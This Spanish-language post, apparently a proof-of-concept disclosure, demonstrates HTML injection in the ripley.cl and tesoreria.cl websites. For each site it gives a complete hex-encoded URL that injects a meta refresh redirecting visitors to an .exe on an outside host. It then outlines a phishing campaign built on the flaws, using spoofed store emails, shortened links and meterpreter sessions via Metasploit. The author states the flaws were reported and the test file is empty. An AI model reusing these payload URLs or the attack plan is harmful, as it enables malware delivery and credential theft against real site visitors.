Primer caso:
Sitio: www.ripley.cl , el xss fue reportado hace mucho tiempo, aun asi permite el uso de una etiqueta html que nos permite redireccionar hacia un sitio arbitrariamente. Para la prueba he subido un .exe SIN contenido solo como prueba de concepto a un host.
Al entrar al sitio principal de RIPLEY, no redirige automáticamente a http://www.ripley.cl/webapp/wcs/stores/servlet/StoreCatalogDisplay?storeId=10051&catalogId=100516
, es la variable catalogId la que nos permite el uso de esta etiqueta.
La Url la dejamos de la forma siguiente con un poco de Hexa redireccionando al sitio con el .exe:
http://www.ripley.cl/webapp/wcs/stores/servlet/StoreCatalogDisplay?storeId=10051&catalogId=10051%27%22%3e%3c%6d%65%74%61%20%68%74%74%70%2d%65%71%75%69%76%3d%22%52%65%66%72%65%73%68%22%20%63%6f%6e%74%65%6e%74%3d%22%30%3b%75%72%6c%3d%68%74%74%70%73%3a%2f%2f%77%77%77%2e%64%72%69%76%65%68%71%2e%63%6f%6d%2f%66%69%6c%65%2f%44%46%50%75%62%6c%69%73%68%46%69%6c%65%2e%61%73%70%78%2f%46%69%6c%65%49%44%31%30%39%34%31%30%39%38%36%37%2f%4b%65%79%72%77%69%36%61%63%78%6c%67%33%61%64%2f%70%6f%63%2e%65%78%65%22%3e
Obteniendo lo siguiente:
Segundo caso:
El Cross-site Scripting fue reportado a Secureless mediante el ID : #2258
y afecta la variable 'idn' . Realizamos el mismo procedimiento y obtenemos.
http://www.tesoreria.cl/web/noticias/verDetalle.do?idn=4126%27%22%3e%3c%6d%65%74%61%20%68%74%74%70%2d%65%71%75%69%76%3d%22%52%65%66%72%65%73%68%22%20%63%6f%6e%74%65%6e%74%3d%22%30%3b%75%72%6c%3d%68%74%74%70%73%3a%2f%2f%77%77%77%2e%64%72%69%76%65%68%71%2e%63%6f%6d%2f%66%69%6c%65%2f%44%46%50%75%62%6c%69%73%68%46%69%6c%65%2e%61%73%70%78%2f%46%69%6c%65%49%44%31%30%39%34%31%30%39%38%36%37%2f%4b%65%79%72%77%69%36%61%63%78%6c%67%33%61%64%2f%70%6f%63%2e%65%78%65%22%3e
Obtenemos lo siguiente:
Está claro que podemos tomar ventajas del Xss, ya no basta como decian antes verificar el comienzo de la Url, aun mas podriamos utilizar un acortador de url y seria aun mas efectivo.
Imaginemos un ataque mas completo en el caso de Ripley:
Mediante el uso de Mail Spoofing enviamos propaganda de la tienda con una promocion llamativa o con un premio tentador, desde un remitente bastante creible que no levante sospechas
Incluimos un link con raiz http://www.ripley.cl que redireccione , a distintas opciones, puede ser:
- La descarga de malware
- A un sitio con malware
- Descarga de un .exe para obtener un session meterpreter.
- Redirrecionar a un sitio con publicidad
- Asociar con metasploit para obtener una sesion meterpreter via Uripath
Lo que se les pudiera ocurrir. Un usuario promedio podria caer facilmente en un "ataque" como este sin mayor preocupacion, y ¿Cual fue el origen? , bueno el Cross-site scripting en el sitio.
Saludos:
PD: El sitio de Ripley de reportado hace meses, y la inyeccion de Javascript al parecer fue corregida no asi la utilizacion de esta etiqueta html, en el caso de Tesoreria.cl esta reportado a Secureless como mencione anteriormente por algun usuario, no se la existencia de un reporte directo, emitire uno de todas maneras.
PD2: EL .exe utilizado en esta prueba no contiene ningun tipo de malware, consiste nada mas que en un archivo vacio en formato .exe.
